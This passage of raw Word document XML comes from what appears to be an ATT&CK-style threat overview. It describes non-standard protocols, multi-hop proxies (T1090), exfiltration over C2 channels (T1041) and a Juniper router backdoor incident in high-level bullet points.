          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221F678" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Raw TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF925A6" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102612CC" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABC625" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Custom binary protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD4F76" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why Attackers Use It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E296D" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Harder to inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B421AB" w14:textId="409A0B15" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Avoids web proxy logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FF61E" w14:textId="77777777" w:rsidR="00B42FCF" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00B42FCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677C5CA9" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Proxy / Multi-hop Proxy — T1090 / T1090.003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB9A6F" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers route malicious traffic through intermediary systems to conceal their identity and infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57606266" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ABC73C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hide attacker origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04071D05" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Obfuscate infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF10297" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Evade attribution and tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD100D" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DC194" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SOCKS proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8122C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VPN chains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3DFFCC" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tor networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AF879" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Compromised relay hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546AF8BF" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Multi-hop Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D59978" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Traffic is routed through several chained proxy systems before reaching the final destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D6184" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="1C47B85B">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42E562" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766D81D" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exfiltration Over C2 Channel — T1041</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D9F82" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers transfer stolen data through the same communication channel used for command-and-control traffic. This helps malicious activity blend in with existing network communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D294D" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06381B" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Uploading files through malware beacon connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA32214" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sending archives through encrypted TCP sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F0A91" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why Attackers Prefer This Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69254A72" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Blends with existing traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED2496" w14:textId="3E35CBF3" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Produces fewer network indicators and alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB523FE" w14:textId="35542A72" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Real-world Incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32A096" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Juniper Router Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447881D" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The most notable incident involved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D9069" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise of Juniper MX routers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9D7BF" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom backdoors inserted into Junos OS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73369ECA" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Covert packet-capture functionality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11769483" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Malware hidden within legitimate router processes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C1313" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
